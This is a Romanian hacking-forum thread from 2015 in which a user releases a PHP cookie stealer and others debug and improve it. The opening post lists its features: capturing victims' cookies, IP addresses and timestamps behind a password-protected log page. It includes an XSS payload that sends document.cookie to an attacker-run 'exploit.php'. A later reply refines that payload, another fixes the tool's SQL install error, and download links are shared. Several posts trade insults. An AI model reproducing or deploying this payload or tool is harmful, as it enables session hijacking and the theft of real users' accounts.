[PHP]Cookie stealer [new version]

[shadowSQLi]

am terminat de lucrat la el.

Ce contine el/cu ce ne ajuta?

-Furtul de cookies

-IP Victim

-Data curenta cand s-a furat cookieurile

-Securizat

-Are parola la pagina de logs log.php este "shadow"

#Vector XSS:

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script> 

la inceputul videoclipului aveti tutorialul de configurare si la sfarsit un test sa vedeti cum functioneaza.

#Video: https://vid.me/OckG

#Download: Zippyshare.com - s2.rar

Edited March 22, 2015 by shadowSQLi

[askwrite]

Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy pasteuit, ai recunoscut.

1. In post specifici ca parola e rstforums dar

2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezi

mysql_select_db( 'a3797662_shadow' );

3. In install.php ai

$sql = "CREATE TABLE data2 (...........

dar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)

4. Codul arata ca o pula, esti analfabet, tot ce-ai "facut tu" e un mare cacat.

//Edit: @shadowSQLi cine a zis ca nu am inteles? e vorba ca ne pui pe noi sa modificam cand tu puteai sa pui direct scriptul cum trebuie. si chiar nu ma intereseaza ca esti incepator sau nu, odata ce te apuci sa faci ceva, il faci functional din toate punctele de vedere, mai ceri ajutorul altcuiva etc etc si cand gresesti nu incepi si injuri, accepti ca ai gresit, rezolvi si gata

Edited March 22, 2015 by askwrite

[shadowSQLi]

Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy paste-uit, ai si recunoscut.

1. In post specifici ca parola e rstforums dar

2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezi

3. In install.php ai

dar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)

4. Codul arata ca o pula, in concluzie e un mare cacat.

// @askwrite mai taci in plm..

sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune

Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificat

Edited March 22, 2015 by shadowSQLi

[Nytro]

Asa inveti, incercand si acceptand critici. Continua.

[webstar92]

Cand deschid install.php

Connected successfully

Could not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6

Edited March 26, 2015 by webstar92

[Guest CM3D]

Cand deschid install.php

Connected successfully

Could not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6

Schimba "TYPE=MyISAM AUTO_INCREMENT=2" in "ENGINE=MyISAM AUTO_INCREMENT=2"

[Kalashnikov.]

// @askwrite mai taci in plm..

sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune

Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificat

In orice domeniu daca vrei sa fii bun trebuie sa cauti critice nu laude !!

[TheTime]

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script>

ar trebui shimbat in

<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+encodeURIComponent(document.cookie);</script>

[kNigHt]

Daca vrei sa inveti si esti interesat, ia d-aci:

http://www74.zippyshare.com/v/OR8HnDQ7/file.html

Ti-am cosmetizaat putin scriptul cu ceva good practices. Insista pe PDO, mysql_query e mort

Daca ai rabdare si nu esti foarte insistent, poti sa ma intrebi ce nu intelegi.

Spor